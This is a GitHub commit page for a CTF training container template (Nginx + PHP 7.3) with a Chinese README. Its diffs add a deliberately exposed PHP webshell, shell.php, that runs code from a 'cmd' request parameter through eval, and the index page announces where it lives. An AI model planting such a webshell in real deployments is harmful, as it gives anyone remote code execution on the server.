-
Notifications
You must be signed in to change notification settings - Fork 30
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
29a7ff0
commit 1f673bc
Showing
5 changed files
with
59 additions
and
9 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,3 +1,30 @@ | ||
| # web-nginx-php73 | ||
|
|
||
| 部分容器逻辑参考自:[CTFTraining / base_image_nginx_php_73](https://github.com/CTFTraining/base_image_nginx_php_73),在此感谢[陌竹 - mozhu1024](https://github.com/mozhu1024)师傅做出的贡献 | ||
| 部分容器逻辑参考自:[CTFTraining / base_image_nginx_php_73](https://github.com/CTFTraining/base_image_nginx_php_73),在此感谢 [陌竹 - mozhu1024](https://github.com/mozhu1024) 师傅做出的贡献 | ||
|
|
||
| ## 环境说明 | ||
|
|
||
| 提供 `Nginx` +`PHP 7.3.33` 的基础环境,默认暴露端口位于 80 | ||
|
|
||
| > 请注意 !!! | ||
| > | ||
| > 需要注意的是,模板默认会将 flag 保存在 / flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句 | ||
| ## 如何使用 | ||
|
|
||
| 直接将 PHP 项目放入 `./src` 目录即可 | ||
|
|
||
| 源码放置进 `./src` 目录之后,执行 | ||
|
|
||
| ```shell | ||
| docker build . | ||
| ``` | ||
|
|
||
| 即可开始编译镜像 | ||
|
|
||
| 也可以在安放好相关项目文件之后,直接使用 `./docker/docker-compose.yml` 内的 `docker-compose` 文件实现一键启动测试容器 | ||
|
|
||
| ```shell | ||
| cd ./docker | ||
| docker-compose up -d | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -6,3 +6,4 @@ | |
| else{ | ||
| echo "error"; | ||
| } | ||
| echo $flag; | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,3 +1,13 @@ | ||
| <?php | ||
| include 'flag.php'; | ||
| echo $flag; | ||
| <pre> | ||
|
|
||
| ____ _____ _____ _ _ _ | ||
| / ___|_ _| ___| / \ _ __ ___| |__ (_)_ _____ ___ | ||
| | | | | | |_ _____ / _ \ | '__/ __| '_ \| \ \ / / _ \/ __| | ||
| | |___ | | | _|_____/ ___ \| | | (__| | | | |\ V / __/\__ \ | ||
| \____| |_| |_| /_/ \_\_| \___|_| |_|_| \_/ \___||___/ | ||
|
|
||
|
|
||
| </pre> | ||
|
|
||
| <h3> Webshell is in /shell.php </h3> | ||
| <h3> flag is in /flag.php </h3> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1 +1,14 @@ | ||
| <?php @eval($_POST['a']) ?> | ||
| <?php | ||
| if(isset($_REQUEST['cmd'])){ | ||
| echo "<pre>"; | ||
| $cmd = ($_REQUEST['cmd']); | ||
| @eval($cmd); | ||
| echo "</pre>"; | ||
| die; | ||
| } | ||
| else{ | ||
| show_source(__FILE__); | ||
| phpinfo(); | ||
| } | ||
|
|
||
| ?> |